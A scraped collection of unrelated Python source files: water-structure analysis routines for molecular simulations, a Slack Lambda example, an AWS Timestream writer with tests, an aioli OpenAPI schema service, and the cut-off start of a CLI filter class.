Note that to get right coefficients, will need to divide by total number of angles.
This is not done by default, assuming that angles provided are for each frame.
Inputs:
allangs - array or list of angles
Norder - (default 180) number of terms in sine series to use (excludes k=0)
doNormalize - (default False) if true, divides by number of samples to correctly normalize
Outputs:
coeffs - Norder x 2 array; 1st column is k, second column is coefficient
Comes from fact that period is zero to Pi, so only keep sin(k*angle) in series
"""
#Check if angles in radians - if any values are greater than Pi, assume in degrees
if np.max(allangs) > np.pi:
allangs = allangs * np.pi / 180.0
coeffs = np.zeros((Norder,2))
for k in range(Norder):
coeffs[k,0] = k+1
coeffs[k,1] = np.sqrt(2.0/np.pi)*np.sum(np.sin((k+1)*allangs))
if doNormalize:
coeffs = coeffs / len(allangs)
return coeffs
def distFromCoeffs(coeffs, angvals=None, Norder=60):
"""Given an array of coefficients for a sine series, compute the distribution.
Inputs:
coeffs - coefficients for each term in a sine series
assuming that for sin(k*angle) form, this array is sorted from small to large k
angvals - (default 0.0 to 180.0 by 0.01) angle values in degrees at which distribution
should be evaluated - normalization will be done for PDF along degrees
Norder - (default 60) number of terms in the series to use (i.e. number of coeffs)
Outputs:
adist - returns a normalized distribution
"""
if angvals is None:
angvals = np.arange(0.0, 180.0, 0.01)
#Also define in radians
radvals = angvals * np.pi / 180.0
adist = np.zeros(len(angvals))
normfac = 0.0
for k in range(Norder):
adist += coeffs[k]*np.sin((k+1)*radvals)
if (k+1)%2 != 0:
normfac += coeffs[k]*2.0/(k+1)
adist = adist / (normfac*(angvals[1]-angvals[0]))
return adist
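# --- Editor's illustrative sketch, not part of the original module ---
# Round-trips a sample of 3-body angles through the sine series: fit the
# coefficients with findSineCoeffs, then rebuild a normalized distribution
# with distFromCoeffs on a 0-180 degree grid.
def _example_sine_series_roundtrip(angVals, Norder=60):
    coeffs = findSineCoeffs(angVals, Norder=Norder, doNormalize=True)
    angGrid = np.arange(0.0, 180.0, 0.01)
    adist = distFromCoeffs(coeffs[:, 1], angvals=angGrid, Norder=Norder)
    return angGrid, adist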
def fitDist(refDists, Dist, bruteNs=200):
"""Given a set of reference distributions, as a numpy array with each distribution as a row,
fits the current distribution using a linear combination of the reference distributions.
Inputs:
refDists - array with each reference distribution as a row
Dist - (3-body angle) distribution to fit as linear combination of references with
the fitting parameters (linear coefficients) summing to one
bruteNs - number of discrete bins to use along each parameter when searching for brute minimum
Outputs:
fitParams - fit parameters resulting from fitting
resSq - sum of squared residuals for fit
resSigned - signed residuals at each point of fit
"""
#Define tolerance
tolf = 1.0e-12
tolx = 1.0e-12
#Initialize parameters to seek for - start in 4 ways and take minimum of these
initParams = np.eye(refDists.shape[0])
initParams = np.vstack((initParams, np.ones(refDists.shape[0]) * (1.0/refDists.shape[0])))
#Define an objective function to be minimized
def funcMin(vals, *withcon):
#Give it parameter values, returns squared residuals
func = np.sum((np.dot(vals, refDists) - Dist)**2)
if withcon:
func = func + (np.sum(vals) - 1.0)**2
return func
def jacFunc(vals):
#Returns the Jacobian of the function to minimize
func = np.dot(refDists, 2.0*(np.dot(vals, refDists) - Dist))
return func
def funcSquares(vals):
#Gives vector of squared residuals to see where best/worst parts of fit are
func = (np.dot(vals, refDists) - Dist)**2
return func
#Define constraints... for now say that all parms must sum to one
cons = ({'type' : 'eq',
'fun' : lambda x: np.sum(x) - 1.0,
'jac' : lambda x: np.ones(len(x))})
#And define bounds to keep all params between 0 and 1
bnds = [(0.0,1.0)]*refDists.shape[0]
#For each set of starting conditions, do minimization, then pick global min
globMinInfo = None
#And will store squared residuals at found mins as go
#Checks if one part of curve fits better than another
resSq = np.zeros((refDists.shape[1], initParams.shape[0]))
for (i, params) in enumerate(initParams):
#If only one distribution given, don't use constraint
if refDists.shape[0] == 1:
mininfo = optimize.minimize(funcMin, params, jac=jacFunc, method='SLSQP',
bounds=bnds, options={'ftol':tolf})
else:
mininfo = optimize.minimize(funcMin, params, jac=jacFunc, method='SLSQP',
constraints=cons, bounds=bnds, options={'ftol':tolf})
#print "Minimum sum of squares: %e at values "%mininfo.fun+str(mininfo.x)
        if globMinInfo is not None:
if mininfo.fun < globMinInfo.fun:
globMinInfo = mininfo
else:
globMinInfo = mininfo
resSq[:,i] = funcSquares(mininfo.x)
#Compare to global min with brute force
if refDists.shape[0] == 1:
(bruteMinInfo) = optimize.brute(funcMin, tuple(bnds), Ns=bruteNs, finish=None, full_output=True, disp=False)
else:
(bruteMinInfo) = optimize.brute(funcMin, tuple(bnds), args=(1,), Ns=bruteNs, finish=None, full_output=True, disp=False)
fitParams = bruteMinInfo[0]
#print "Brute force finds minima at "+str(fitParams)
#Also compute regular residuals, not squared
resSigned = np.dot(fitParams, refDists) - Dist
#print "Best fit found at:"
#print [float(q) for q in fitParams]
#print "And with parameters summing to %f" % np.sum(fitParams)
return fitParams, resSq, resSigned
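#Editor's usage sketch (not part of the original module): fit a target 3-body angle
#distribution as a constrained mixture of two hypothetical reference distributions
#(e.g. ice-like and liquid-like), all evaluated on the same angle grid.
def exampleFitDist(refIce, refLiquid, targetDist):
    refDists = np.vstack((refIce, refLiquid))
    fitParams, resSq, resSigned = fitDist(refDists, targetDist)
    print("Fraction of first reference in fit: %f" % fitParams[0])
    return fitParams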
def waterOrientationBinZ(Opos, Hpos, boxDim, refVec=[0.0, 0.0, 1.0], refBins=None, angBins=None):
"""Determines the angle between a reference vector and the dipoles and plane-normal vector
of all water molecule positions provided.
Inputs:
Opos - all water oxygen positions
Hpos - all water hydrogen positions
boxDim - box dimensions for imaging
refVec - the reference vector for water orientation, default
             is the z-direction [0, 0, 1]
refBins - bins along the direction of refVec that the waters
should be placed into (default is min and max along refVec)
angBins - bins for calculated angles, default 500 bins from 0 to 180
Outputs:
plane2Dhist - 2D histogram with angle bins varying over rows and
                  refVec bins varying over columns (for the water plane vector angles)
dip2Dhist - 2D histogram as above, but for dipole vector angles
"""
#Get positions of oxygen atoms along refVec, then create
#this array with each entry repeated
refVec = refVec / np.linalg.norm(refVec)
zOpos = np.dot(Opos, refVec)
zOposforH = np.array([[z,z] for z in zOpos]).flatten()
#Compute all of the angles with respect to the reference
#Note that the dipole vector of each water molecule will be taken as
#the sum of the OH bond vectors
angDip, angPlane = wl.watorient(Opos, Hpos, refVec, boxDim)
#Set refBins if not set
if refBins is None:
refBins = np.arange(np.min(zOpos), np.max(zOpos), 0.2)
#Same for angBins
if angBins is None:
angBins = np.arange(0.0, 180.001, 180.0/500.0)
#And do 2D histogramming
plane2Dhist, angEdges, refEdges = np.histogram2d(angPlane, zOposforH, bins=[angBins, refBins], normed=False)
dip2Dhist, angEdges, refEdges = np.histogram2d(angDip, zOpos, bins=[angBins, refBins], normed=False)
return plane2Dhist, dip2Dhist
def waterOrientation(Opos, Hpos, boxDim, refVec=[0.0, 0.0, 1.0]):
"""This is a wrapper for the waterlib function watorient.
Inputs:
Opos - all water oxygen positions
Hpos - all water hydrogen positions
boxDim - box dimensions for imaging
refVec - the reference vector for water orientation, default
             is the z-direction [0, 0, 1]
Outputs:
dipAngs - all angles of dipole vectors with reference vector for all waters
planeAngs - all angles of plane-normal vector to reference vector for all waters
"""
#Call watorient to get all angles
dipAngs, planeAngs = wl.watorient(Opos, Hpos, refVec, boxDim)
return dipAngs, planeAngs
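#Editor's sketch (hypothetical single-frame inputs): histogram the water dipole angles
#relative to the z-axis in 1-degree bins using the wrapper above.
def exampleOrientationHist(Opos, Hpos, boxDim):
    dipAngs, planeAngs = waterOrientation(Opos, Hpos, boxDim, refVec=[0.0, 0.0, 1.0])
    counts, edges = np.histogram(dipAngs, bins=np.arange(0.0, 180.001, 1.0))
    return counts, edges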
def binnedVolumePofN(Opos, volBins, numBins, binMask=None):
"""Inputs:
Opos - array of oxygen 3D coordinates
volBins - volume (x,y,z coordinate) bin edges tiling the space to place waters into
Form should be tuple of x, y, and z bin edge arrays
Bins should be uniform (makes no sense to structure analysis this way otherwise)
numBins - bin edges for histogramming number of waters in each volume of volBins
binMask - boolean array of same dimension as number of bins in x, y, z
Use to exclude some bins by changing certain coordinates to False
Outputs:
numWatHist - counts for number of waters in sub-volume of size edgeLxedgeLxedgeL
"""
#Create mask if necessary
if binMask is None:
binMask = np.ones((len(volBins[0])-1, len(volBins[1])-1, len(volBins[2])-1), dtype=bool)
else:
if binMask.shape == (len(volBins[0])-1, len(volBins[1])-1, len(volBins[2])-1):
binMask = binMask
else:
print "Dimensions of mask for spatial bins does not match dimensions of spatial bins. Quitting."
sys.exit(2)
#Want to use sphere rather than cube for statistics
#So first find which bin each oxygen belongs to, then find distance
#to center of bin and see if should exclude or not
#Written in Fortran for speed
hist = wl.binongrid(Opos, volBins[0], volBins[1], volBins[2])
#Use numpy histogramming to count how many oxygens in each cube volume (doesn't use interior spheres)
#hist, edges = np.histogramdd(Opos, bins=volBins, normed=False)
#Now histogram number of waters in each subvolume, which will be P(N)
numWatHist, watedges = np.histogram(hist[binMask].flatten(), bins=numBins, normed=False)
return numWatHist
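#Editor's sketch (hypothetical cubic box of side L, in the same length units as Opos):
#tile the box into 4x4x4 sub-volumes and histogram water occupancies to estimate P(N).
def examplePofN(Opos, L):
    edges = np.arange(0.0, L + 1.0e-6, 4.0)
    volBins = (edges, edges, edges)
    numBins = np.arange(-0.5, 20.5, 1.0)
    return binnedVolumePofN(Opos, volBins, numBins)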
#Should also define some function "pointsInVol" that creates binMask based on given set of points or some geometry that should not be included when finding waters (i.e. like a hard sphere or protein)
def HBondsGeneral(accPos, donPos, donHPos, boxL, accInds, donInds, donHInds, distCut=3.5, angCut=150.0):
"""Wraps generalHbonds in the waterlib library to define H-bonds, and also returns their locations.
Inputs:
accPos - 3-dimensional vectors of acceptor heavy-atom positions
donPos - 3D vectors of donor heavy-atom positions (if have multiple hydrogens, must list multiple times)
donHPos - 3D vector of donor hydrogen positions (should be same length as donPos, which may have duplicates)
accInds - indices of acceptor atoms
donInds - indices of donor heavy-atoms
donHInds - indices of donor hydrogen atoms
boxL - box dimensions
distCut - (default 3.5) heavy-atom to heavy-atom distance below which an H-bond may be defined
angCut - (default 150.0) O-H---O angle cut-off, in degrees, above which an H-bond may be defined
Outputs:
NumHB - number of hydrogen bonds for acceptor/donor set provided
HBlist - NumHB x 2 array with acceptor index in the 1st column and donor index in the 2nd
HBloc - NumHB x 3 array of h-bond locations, which is halfway between the acceptor and donor H
"""
#First get H-bond matrix and locations
HBboolMat = wl.generalhbonds(accPos, donPos, donHPos, boxL, distCut, angCut)
HBboolMat = np.array(HBboolMat, dtype=bool)
#Now parse through matrix, counting H-bonds and creating list of index pairs
NumHB = np.sum(HBboolMat)
HBlist = (-1)*np.ones((NumHB, 2))
HBloc = np.zeros((NumHB, 3))
HBlistCount = 0
for i, abool in enumerate(HBboolMat):
theseDonors = donInds[abool]
if len(theseDonors) > 0:
theseDonHPos = donHPos[abool]
#Image donor H location around acceptor
theseDonHPos = wl.reimage(theseDonHPos, accPos[i], boxL)
for j, aDon in enumerate(theseDonors):
HBlist[HBlistCount,:] = [accInds[i], aDon]
HBloc[HBlistCount] = 0.5*(theseDonHPos[j] + accPos[i])
HBlistCount += 1
return NumHB, HBlist, HBloc
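#Editor's sketch (hypothetical water-only frame): count water-water H-bonds, where every
#oxygen is both an acceptor and (listed once per hydrogen) a donor; assumes Hpos is
#ordered as the two hydrogens of water 0, then water 1, and so on.
def exampleWaterHBonds(Opos, Hpos, boxL):
    accInds = np.arange(len(Opos))
    donInds = np.repeat(accInds, 2)
    donPos = Opos[donInds]
    donHInds = np.arange(len(Hpos))
    return HBondsGeneral(Opos, donPos, Hpos, boxL, accInds, donInds, donHInds)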
def computeSphericalFourierCoeffs(subPos, Pos, BoxDims, lowCut=0.0, highCut=3.413, minDegree=0, maxDegree=12):
"""Computes the vectors of Fourier coefficients for each degree of a spherical harmonic expansion
as described by Keys, Iacovella, and Glotzer, 2011. subPos is treated as the central atoms,
while Pos should include the atoms that may potentially be neighbors.
Inputs:
subPos - positions of atoms to treat as the central atoms
Pos - positions of all other atoms, which will be considered for neighbor-searching; can be same as subPos
BoxDims - box dimensions so that minimum images may be used
lowCut - (default 0.0) the lower cutoff for the radial shell
highCut - (default 3.413) the upper cutoff for the radial shell
minDegree - (default 0) the minimum spherical harmonic degree (l)
maxDegree - (default 12) the maximum spherical harmonic degree (l)
Outputs:
coeffVecs - a len(subPos) x (1 + maxDegree - minDegree) x (2*maxDegree + 1) matrix
For each central atom in subPos, a matrix of the complex-valued vectors (as rows)
is provided. This still allows magnitudes to be easily evaluated, since real and
imaginary parts of zero will contribute nothing to the magnitude
numNeighbs - number of neighbors for each water molecule (necessary to compute global order parameters
or coefficients by multiplying by this and the dividing by the total of the waters
to "average" over)
"""
#Set up the output matrix now since know size
coeffVecs = np.zeros((len(subPos), 1+maxDegree-minDegree, 2*maxDegree+1), dtype=complex)
#And array to return number of neighbors for each water
numNeighbs = np.zeros(len(subPos), dtype='float16')
#Would be nice to combine neighbor searching with 3-body angle computation or H-bonding code
#But then harder to efficiently implement different cutoffs...
#So that might be too ambitious
#Find neighbors within cutoff for ALL atoms in subPos
#But make sure using efficient algorithm...
#If subPos is same as Pos, use allnearneighbors instead
if np.array_equal(subPos, Pos):
nearNeighbs = wl.allnearneighbors(Pos, BoxDims, lowCut, highCut).astype(bool)
else:
nearNeighbs = wl.nearneighbors(subPos, Pos, BoxDims, lowCut, highCut).astype(bool)
#Loop over each position in subPos and find neighbor positions in spherical coordinates
for (i, apos) in enumerate(subPos):
#Make sure have nearest neighbors...
if len(Pos[nearNeighbs[i]]) > 0:
tempPos = wl.reimage(Pos[nearNeighbs[i]], apos, BoxDims) - apos
numNeighbs[i] = len(tempPos)
#Compute radial distances... unfortunate that have to do this again, but maybe improve later
rdists = np.linalg.norm(tempPos, axis=1)
#And get polar and azimuthal angles
polarang = np.arccos(tempPos[:,2]/rdists)
azimang = np.arctan2(tempPos[:,1], tempPos[:,0]) #Using special arctan2 function to get quadrant right
#Now compute Fourier coefficient vectors (i.e. have complex-valued component of coefficient vector
#associated with each m value, where m = -l, -l+1, ... , l)
#Loop over the desired number of coefficients to compute
for l in range(minDegree, maxDegree + 1):
thisvec = np.zeros(2*l + 1, dtype=complex)
#Also note that have one vector for each neighbor, so must loop over neighbors
for j in range(len(tempPos)):
thisvec += sph_harm(np.arange(-l, l+1), l, azimang[j], polarang[j])
thisvec /= len(tempPos)
#And compute the magnitude of this vector of complex numbers
coeffVecs[i,l-minDegree,:(2*l+1)] = thisvec
return coeffVecs, numNeighbs
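#Editor's sketch: rotationally invariant per-molecule magnitudes of the degree-l
#coefficient vectors returned above (subPos, Pos, and BoxDims are hypothetical inputs).
def exampleCoeffMagnitudes(subPos, Pos, BoxDims, l=6):
    vecs, numNeighbs = computeSphericalFourierCoeffs(subPos, Pos, BoxDims,
                                                     minDegree=l, maxDegree=l)
    mags = np.sqrt(np.sum(np.abs(vecs[:, 0, :(2*l + 1)])**2, axis=-1))
    return mags, numNeighbs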
def get1BodyDOFs(coordO, coordH1, coordH2):
"""Given O, H, and H 3D coordinates, identifies the 6 degrees of freedom for a single water
Note that this is assuming an inhomogeneous system
Vector returned is oxygen x, y, z, followed by the spherical coordinate angles for the
dipole vector relative to the oxygen, and the angle of rotation around the dipole vector
COORDINATES SHOULD ALREADY BE IMAGED.
"""
dofVec = np.zeros(6)
dofVec[:3] = coordO[:]
rOD = 0.5*(coordH1 + coordH2) - coordO
rOD /= np.linalg.norm(rOD) #Could hard-code the rOD length for speed... maybe later
rH1H2 = coordH2 - coordH1
rH1H2 /= np.linalg.norm(rH1H2) #And could also hard-code this, too...
#rOH1 = coordH1 - coordO
#rOH1 /= np.linalg.norm(rOH1)
#rOH2 = coordH2 - coordO
#rOH2 /= np.linalg.norm(rOH2)
    unitX = np.array([0.0, 0.0, 1.0]) #Arbitrarily pick an axis (here the z axis, despite the unitX name) to define reference plane for rotation about dipole
#cross1 = np.cross(rOH1, rOH2)
#cross1 /= np.linalg.norm(cross1)
crossX = np.cross(rOD, unitX)
crossX /= np.linalg.norm(crossX)
dofVec[3] = np.arctan2(rOD[1], rOD[0]) #Making sure to use arctan2 to cover range [-pi, pi]
dofVec[4] = np.arccos(rOD[2]) #Taking last element is same as dotting with unit Z vector
dofVec[5] = np.arccos(np.dot(rH1H2, crossX))
#dofVec[5] = np.arccos(np.dot(cross1, crossX))
return dofVec
def get2BodyDOFs(coordO1, coordH11, coordH12, coordO2, coordH21, coordH22):
"""Given 3D coordinates for all atoms in two water molecules, computes specifically 2-body degrees of freedom
Note that returns only 6 degrees of freedom, so excludes the DOFs for the first water
ONLY gives those relevant to relative distance and orientation of two waters
Order in returned vector is rO1O2, theta1, theta2, phi, chi1, chi2 (see Lazaridis and Karplus for definitions)
COORDINATES SHOULD ALREADY BE IMAGED
"""
dofVec = np.zeros(6)
rO1O2 = coordO2 - coordO1
dofVec[0] = np.linalg.norm(rO1O2)
rO1O2 /= dofVec[0]
rO2O1 = -rO1O2
rO1D1 = 0.5*(coordH11 + coordH12) - coordO1
rO1D1 /= np.linalg.norm(rO1D1) #Could hard-code to speed up... may do later
rO2D2 = 0.5*(coordH21 + coordH22) - coordO2
rO2D2 /= np.linalg.norm(rO2D2)
#Need to figure out which H is closer to other oxygen to define rH11H12 according to Lazaridis and Karplus, 1996
if np.linalg.norm(coordH11 - coordO2) <= np.linalg.norm(coordH12 - coordO2):
rH11H12 = coordH12 - coordH11
else:
rH11H12 = coordH11 - coordH12
rH11H12 /= np.linalg.norm(rH11H12) #Again, could hard code if wanted
if np.linalg.norm(coordH21 - coordO1) <= np.linalg.norm(coordH22 - coordO1):
rH21H22 = coordH22 - coordH21
else:
rH21H22 = coordH21 - coordH22
rH21H22 /= np.linalg.norm(rH21H22)
cross1 = np.cross(rO1O2, rO1D1)
cross1 /= np.linalg.norm(cross1)
cross2 = np.cross(rO2D2, rO2O1)
cross2 /= np.linalg.norm(cross2)
dofVec[1] = np.arccos(np.dot(rO1D1, rO1O2))
dofVec[2] = np.arccos(np.dot(rO2D2, rO2O1))
dofVec[3] = np.arccos(np.dot(cross1, cross2))
dofVec[4] = np.arccos(np.dot(rH11H12, cross1))
dofVec[5] = np.arccos(np.dot(rH21H22, cross2))
return dofVec
def get3BodyDOFs(coordO1, coordH11, coordH12, coordO2, coordH21, coordH22, coordO3, coordH31, coordH32):
"""Like above function, but gives 6 DOFs pertaining to just the 3-body degrees of freedom
Order in returned vector is rO1O3 (distance), theta3b (three-body angle),
omega (rotation of 3rd water around O1-O3 vector), then theta3, phi3, and chi3
(last three defined as for the second water in the 2-body DOFs, but for just the third water)
COORDINATES SHOULD ALREADY BE IMAGED
"""
dofVec = np.zeros(6)
rO1O2 = coordO2 - coordO1
rO1O2 /= np.linalg.norm(rO1O2)
rO2O1 = -rO1O2
rO1O3 = coordO3 - coordO1
dofVec[0] = np.linalg.norm(rO1O3)
rO1O3 /= dofVec[0]
rO3O1 = -rO1O3
rO1D1 = 0.5*(coordH11 + coordH12) - coordO1
rO1D1 /= np.linalg.norm(rO1D1)
rO3D3 = 0.5*(coordH31 + coordH32) - coordO3
rO3D3 /= np.linalg.norm(rO3D3)
if np.linalg.norm(coordH31 - coordO1) <= np.linalg.norm(coordH32 - coordO1):
rH31H32 = coordH32 - coordH31
else:
rH31H32 = coordH31 - coordH32
rH31H32 /= np.linalg.norm(rH31H32)
cross12 = np.cross(rO1O2, rO1D1)
cross12 /= np.linalg.norm(cross12)
cross13 = np.cross(rO1O3, rO1D1)
cross13 /= np.linalg.norm(cross13)
cross31 = np.cross(rO3D3, rO3O1)
cross31 /= np.linalg.norm(cross31)
rperp = rO1O3 - np.dot(rO1O2, rO1O3)*rO1O2
rperp /= np.linalg.norm(rperp)
dofVec[1] = np.arccos(np.dot(rO1O2, rO1O3))
dofVec[2] = np.arccos(np.dot(rperp, cross12))
dofVec[3] = np.arccos(np.dot(rO3D3, rO3O1))
dofVec[4] = np.arccos(np.dot(cross13, cross31))
dofVec[5] = np.arccos(np.dot(rH31H32, cross31))
return dofVec
def distanceMetric1B(vec1, vec2, Rsq=(0.09572**2), sintw=(np.sin(104.52*np.pi/180.0)**2)):
"""Computes distance metric appropriate to 1-body DOFs.
A direct Euclidean distance is not appropriate since using curvilinear coordinates,
so this defines a distance utilizing local curvature that is exact for very small
differences. It comes from Taylor-expanding the formula for Euclidean distance in
spherical coordinates with respect to both angles to second order.
"""
diffs = (vec2 - vec1)**2
dist = np.sqrt(diffs[0] + diffs[1] + diffs[2] + Rsq*diffs[3]
+ Rsq*np.sin(vec2[3])*np.sin(vec1[3])*diffs[4]
+ Rsq*sintw*diffs[5])
return dist
def distanceMetric2B(vec1, vec2, Rsq=(0.09572**2), sintw=(np.sin(104.52*np.pi/180.0)**2)):
"""Computes distance metric appropriate to 2-body DOFs.
A direct Euclidean distance is not appropriate since using curvilinear coordinates,
so this defines a distance utilizing local curvature that is exact for very small
differences. It comes from Taylor-expanding the formula for Euclidean distance in
spherical coordinates with respect to both angles to second order.
Note that this includes 1-body degrees of freedom, so expects 12-dimensional vectors.
"""
diffs = (vec2 - vec1)**2
dist = np.sqrt(diffs[0] + diffs[1] + diffs[2] + Rsq*diffs[3]
+ Rsq*np.sin(vec2[3])*np.sin(vec1[3])*diffs[4]
+ Rsq*sintw*diffs[5]
+ diffs[6] + Rsq*diffs[7] + Rsq*diffs[8]
+ Rsq*np.sin(vec2[8])*np.sin(vec1[8])*diffs[9]
+ Rsq*sintw*diffs[10] + Rsq*sintw*diffs[11])
return dist
def distanceMetric3B(vec1, vec2, Rsq=(0.09572**2), sintw=(np.sin(104.52*np.pi/180.0)**2)):
"""Computes distance metric appropriate to 3-body DOFs.
A direct Euclidean distance is not appropriate since using curvilinear coordinates,
so this defines a distance utilizing local curvature that is exact for very small
differences. It comes from Taylor-expanding the formula for Euclidean distance in
spherical coordinates with respect to both angles to second order.
Note that this includes 1- and 2-body degrees of freedom, so expects 18-dimensional vectors.
"""
diffs = (vec2 - vec1)**2
dist = np.sqrt(diffs[0] + diffs[1] + diffs[2] + Rsq*diffs[3]
+ Rsq*np.sin(vec2[3])*np.sin(vec1[3])*diffs[4]
+ Rsq*sintw*diffs[5]
+ diffs[6] + Rsq*diffs[7] + Rsq*diffs[8]
+ Rsq*np.sin(vec2[8])*np.sin(vec1[8])*diffs[9]
+ Rsq*sintw*diffs[10] + Rsq*sintw*diffs[11]
+ diffs[12] + vec2[12]*vec1[12]*diffs[13]
+ vec2[12]*vec1[12]*np.sin(vec2[13])*np.sin(vec1[13])*diffs[14]
+ Rsq*diffs[15]
+ Rsq*np.sin(vec2[15])*np.sin(vec1[15])*diffs[16]
+ Rsq*sintw*diffs[17])
return dist
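#Editor's sketch (hypothetical, already-imaged coordinates): assemble the 12-dimensional
#1-body + 2-body DOF vector for two water pairs and compare them with the curvilinear
#metric above; each wat* argument is a tuple (coordO, coordH1, coordH2).
def examplePairDistance(watA, watB, watC, watD):
    vec1 = np.concatenate((get1BodyDOFs(watA[0], watA[1], watA[2]),
                           get2BodyDOFs(watA[0], watA[1], watA[2], watB[0], watB[1], watB[2])))
    vec2 = np.concatenate((get1BodyDOFs(watC[0], watC[1], watC[2]),
                           get2BodyDOFs(watC[0], watC[1], watC[2], watD[0], watD[1], watD[2])))
    return distanceMetric2B(vec1, vec2)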
``` |
{
"source": "Jimon-s/slackhub",
"score": 3
} |
#### File: slackhub/examples/lambda_function.py
```python
import logging
import urllib.request
import json
logger = logging.getLogger(__name__)
def lambda_handler(event, context):
# Get user input values.
lunch_input = event["view"]["state"]["values"]["lunch_block"]["lunch_action"]["value"]
detail_input = event["view"]["state"]["values"]["detail_block"]["detail_action"]["value"]
# Get private_metadata fields value.
# NOTE: private_metadata field's type is simply "String". SlackHub stores some convenient values in the form of JSON.
# In order to use them easily, you should convert private_metadata field value to JSON.
private_metadata_str = event["view"]["private_metadata"]
private_metadata = json.loads(private_metadata_str)
response_url = private_metadata["response_url"]
# Send a message to Slack.
msg = ("What is your favorite lunch?\n - {}"
"\nTell us more!\n - {}").format(lunch_input, detail_input)
params = {
"text": msg
}
headers = {
"Content-Type": "application/json"
}
req = urllib.request.Request(
response_url, json.dumps(params).encode(), headers)
try:
urllib.request.urlopen(req)
except urllib.error.HTTPError as err:
# If status code is 4XX or 5XX
logger.error(err.code)
except urllib.error.URLError as err:
# If HTTP communication somehow failed
logger.error(err.reason)
return
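# Editor's local-test sketch (hypothetical values, not part of the original example):
# the handler above only reads the two block/action ids and private_metadata.response_url,
# so a minimal event for a local run looks like this.
if __name__ == "__main__":
    fake_event = {
        "view": {
            "state": {"values": {
                "lunch_block": {"lunch_action": {"value": "Tacos"}},
                "detail_block": {"detail_action": {"value": "Street-style, with extra salsa"}},
            }},
            "private_metadata": json.dumps({"response_url": "https://example.invalid/response"}),
        }
    }
    lambda_handler(fake_event, None)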
``` |
{
"source": "Jimon-s/terraform-example-timestream",
"score": 2
} |
#### File: lambda/src/test_timestream_data_writer.py
```python
import pytest
import boto3
from botocore.stub import Stubber
from timestream_data_writer import TimeStreamDataWriter
import os
os.environ['AWS_ACCESS_KEY_ID'] = 'DUMMY_VALUE'
os.environ['AWS_SECRET_ACCESS_KEY'] = 'DUMMY_VALUE'
os.environ['AWS_DEFAULT_REGION'] = 'ap-northeast-1'
def test_write_records_success():
client = boto3.client('timestream-write')
stubber = Stubber(client)
stubber.add_response('write_records', {'ResponseMetadata':
{
'HTTPStatusCode': 200
}
})
stubber.activate()
# Given
database_name = 'test_database'
table_name = 'test_table'
records = [
{
'Dimensions': [
{
'Name': 'hoge',
'Value': 'fuga',
'DimensionValueType': 'VARCHAR'
},
],
'MeasureName': 'status',
'MeasureValue': 'ok',
'MeasureValueType': 'VARCHAR',
'Time': '1234',
'TimeUnit': 'MILLISECONDS',
'Version': 1234
},
]
# When
timestream_writer = TimeStreamDataWriter(client)
got = timestream_writer.write_records(
database_name=database_name, table_name=table_name, records=records)
# Then
assert got['ResponseMetadata']['HTTPStatusCode'] == 200
def test_write_records_failure():
client = boto3.client('timestream-write')
stubber = Stubber(client)
stubber.add_client_error('write_records', 'want error')
    stubber.activate()
# Given
database_name = 'test_database'
table_name = 'test_table'
records = [
{
'Dimensions': [
{
'Name': 'hoge',
'Value': 'fuga',
'DimensionValueType': 'VARCHAR'
},
],
'MeasureName': 'status',
'MeasureValue': 'ok',
'MeasureValueType': 'VARCHAR',
'Time': '1234',
'TimeUnit': 'MILLISECONDS',
'Version': 1234
},
]
timestream_writer = TimeStreamDataWriter(client)
with pytest.raises(Exception) as e:
# When
timestream_writer.write_records(
database_name=database_name, table_name=table_name, records=records)
# Then
assert str(e.value) == 'want error'
```
#### File: lambda/src/timestream_data_writer.py
```python
from typing import List
class TimeStreamDataWriter:
def __init__(self, client) -> None:
self.client = client
def write_records(self, database_name: str, table_name: str, records: List[dict], common_attributes: List[dict] = None,):
if self.client is None:
raise Exception('client is not set')
if common_attributes is None:
response = self.client.write_records(
DatabaseName=database_name,
TableName=table_name,
Records=records
)
return response
else:
response = self.client.write_records(
DatabaseName=database_name,
TableName=table_name,
CommonAttributes=common_attributes,
Records=records
)
return response
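# Editor's usage sketch (hypothetical database/table names): the unit tests above stub the
# boto3 client, but against a real account the writer is used like this.
if __name__ == '__main__':
    import boto3
    writer = TimeStreamDataWriter(boto3.client('timestream-write'))
    writer.write_records(
        database_name='example_db',
        table_name='example_table',
        records=[{
            'Dimensions': [{'Name': 'host', 'Value': 'web-1'}],
            'MeasureName': 'status',
            'MeasureValue': 'ok',
            'MeasureValueType': 'VARCHAR',
            'Time': '1600000000000',
        }])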
``` |
{
"source": "jimorie/aioli-openapi",
"score": 2
} |
#### File: aioli-openapi/aioli_openapi/service.py
```python
import warnings
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from aioli.service import BaseService
from aioli.controller import BaseHttpController
from aioli.exceptions import NoMatchFound
class OpenApiService(BaseService):
_specs = {}
def oas_schema(self, pkg):
spec = APISpec(
title=pkg.meta["name"].capitalize(),
version=pkg.meta["version"],
openapi_version=self.config["oas_version"],
plugins=[MarshmallowPlugin()],
)
for ctrl in pkg.controllers:
if not isinstance(ctrl, BaseHttpController):
continue
routes = {}
for func, handler in ctrl.handlers:
if not handler.status:
warnings.warn(f"No @returns for {func}, cannot generate OAS3 schema for this handler")
break
abspath = handler.path_full
method = handler.method.lower()
if abspath not in routes:
routes[abspath] = {}
if method not in routes[abspath]:
routes[abspath][method] = dict(
responses={},
parameters=[]
)
route = routes[abspath][method]
responses = route["responses"]
parameters = route["parameters"]
for location, schema_cls in handler.schemas:
if location == "response":
if not schema_cls:
content = {}
else:
content = {"application/json": {"schema": schema_cls}}
responses[handler.status] = dict(
description=None,
content=content
)
elif location in ["path", "query", "header"]:
if not schema_cls:
continue
parameters.append({
"in": location,
"schema": schema_cls
})
spec.path(handler.path_full, operations=routes[abspath])
return spec.to_dict()
async def on_startup(self):
for pkg in self.app.registry.imported:
if not pkg.config["path"]:
continue
self._specs[pkg.meta["name"]] = self.oas_schema(pkg)
async def get_schemas(self, **query):
return self._specs
async def get_schema(self, name):
if name not in self._specs:
raise NoMatchFound
return self._specs[name]
``` |
{
"source": "jimorie/nacl",
"score": 3
} |
#### File: nacl/nacl/filters.py
```python
import typing as t
import click
from nacl.expression import Expression
from nacl.errors import errorhandler
class FilterType(click.ParamType):
"""
A `click.ParamType` that converts the parameter input to an `Expression`
object instance. If `register_filter` is `True` all `Expression`
instances created by this `FilterType` instance are also collected in the
class variable `FilterType.registered_filters`.
"""
registered_filters: t.List[Expression] = []
name = "FILTER"
def __init__(self, filter_cls: Expression = None, register_filter=True):
super().__init__()
self.filter_cls = filter_cls or Expression
self.register_filter = register_filter
@errorhandler
def convert(self, value: t.Any, *_) -> Expression:
if isinstance(value, self.filter_cls):
return value
